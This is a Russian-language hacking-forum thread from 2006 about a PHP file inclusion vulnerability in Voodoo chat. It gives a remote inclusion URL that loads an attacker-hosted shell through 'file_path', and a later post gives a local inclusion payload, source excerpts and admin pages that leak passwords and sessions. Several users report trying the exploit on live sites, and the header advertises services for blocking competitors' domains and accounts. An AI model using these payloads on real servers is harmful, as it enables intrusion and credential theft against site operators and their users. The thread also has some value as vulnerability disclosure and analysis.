Форум АНТИЧАТ - PHP-инклюдинг в Voodoo chat

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
PHP-инклюдинг в Voodoo chat

Опции темы

Поиск в этой теме

Опции просмотра

PHP-инклюдинг в Voodoo chat

02.08.2006, 03:45

~~tclover~~

Banned

Регистрация: 13.12.2005

Сообщений: 1,091

Провел на форуме:
9751364

Репутация: 1847

PHP-инклюдинг в Voodoo chat

Программа: Voodoo chat 1.0RC1b и предыдущих

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "file_path" в сценарии index.php.

Пример:

http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?

источник xakep.ru

02.08.2006, 08:04

Electro

Участник форума

Регистрация: 23.10.2005

Сообщений: 276

Провел на форуме:
1095453

Репутация: 113

Отправить сообщение для Electro с помощью ICQ

Мдаа... Жаль что в новых версиях не пашет

02.08.2006, 12:27

m0nzt3r

ветеран

Регистрация: 22.06.2004

Сообщений: 2,128

Провел на форуме:
5355463

Репутация: 2258

гг я тож увидел.Думал дожили...Ппробовал на одном, неспахало

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

02.08.2006, 13:49

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

В одном получилось) Молодец кловер.

__________________
..

03.08.2006, 01:04

grinay

IQ- 137%

Регистрация: 15.06.2004

Сообщений: 441

Провел на форуме:
1212666

Репутация: 662

Отправить сообщение для grinay с помощью ICQ

if (!in_array($user_lang, $allowed_langs)) $user_lang = $language;
else include_once($file_path.\"languages/\".$language.\".php\");
и где тут инклуд?

Чет не совсем понял

__________________

03.08.2006, 02:22

~~forever777~~

Banned

Регистрация: 12.06.2005

Сообщений: 278

Провел на форуме:
274158

Репутация: -1

Отправить сообщение для forever777 с помощью ICQ

чето я таких версий чата найти не могу!

03.08.2006, 02:31

dinar_007

Флудер

Регистрация: 18.01.2005

Сообщений: 2,298

Провел на форуме:
13936387

Репутация: 1844

Отправить сообщение для dinar_007 с помощью ICQ

форевер777, а зачем тебе их искать? Вред, незнакомому тебе, чату хочешь причинить? Не надо быть злоумышленником :-)

03.08.2006, 12:53

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Динар, без флейма. Сам ведь модер, понимать должен.

__________________
..

Последний раз редактировалось [sL1p]; 03.08.2006 в 13:36..

03.08.2006, 20:04

Rabid Rabbit

Участник форума

Регистрация: 31.08.2003

Сообщений: 177

Провел на форуме:
249275

Репутация: 22

Начица раздупляю ситуасьён. Не знаю как там в предыдущих версиях (мож кто поделится сорцами?) но на данный момент мы имеем следующее:

---------------------------- файл <host>/chat/index.php
<?php
require_once("inc_common.php");
---------------------------- <host>/chat/inc_common.php
if (!($conf_content = implode("",file($data_path."voc.conf")))) {
trigger_error("1000\tCannot open voc.conf file, please check your DATA PATH parameter",E_USER_ERROR);
}
eval($conf_content);
---------------------------- и наконец в <host>/data/voc.conf имеем
$file_path = "<host>/chat/";
----------------------------

такие пироги. пороюсь еще по остальным пхп завтра.

#10

04.08.2006, 13:10

Rabid Rabbit

Участник форума

Регистрация: 31.08.2003

Сообщений: 177

Провел на форуме:
249275

Репутация: 22

Итак, прадолжим. Бегло просотрел пхп-хи в <host>/chat/ - подкопаться сложно. Вощем надоело и я решил пойти другим путем. И таки имеем локальный инклуд (в текущей самой новой версии) .
Уязвимость находится в файле <host>/chat/welcome.php :

Код:

require_once("inc_common.php");

////////////// скип ////////////////

set_variable("user_lang");
set_variable("c_ulang");
if ($c_ulang != "" && $user_lang == "") $user_lang = $c_ulang;
if (!in_array($user_lang, $allowed_langs)) $user_lang = $language;
else include_once($file_path."languages/".$user_lang.".php");

////////////// скип ////////////////

Тогда локальный инклуд будет иметь следующий вид:
<host>/chat/welcome.php?allowed_langs[0]=&allowed_langs[1]=&allowed_langs[2]=../welcome&user_lang=../welcome
Инклудим саму себя - чисто для примера.
Ну и register_globals = on разумеется чтобы заработало.
%00 - ессесно не катит потому что в inc_common.php в функции set_variable() присутсвует $$variable_name = str_replace("\0","", $$variable_name);
Поэтому думаю больше тут сделать ничего низя.

Ну и в заключение пару небольших фич:
- получить список всех зарегеных юзеров <host>/chat/photos/renamer.php
- позырить пароль админа здесь: <host>/chat/admin/admin_users.php
- сессию админа здесь : <host>/chat/admin/sessions.php

На этом у меня все.

Последний раз редактировалось Rabid Rabbit; 04.08.2006 в 16:01..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP, PERL, MySQL, JavaScript	186	21.02.2010 02:41
Books	PSalm69	Избранное	248	27.10.2009 04:52
На PHP, как на "Новые ворота"...	Mertvii-Listopad	Чужие Статьи	7	18.09.2006 12:42
Безопасность в Php, Часть Iii	k00p3r	Чужие Статьи	0	11.07.2005 19:02
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход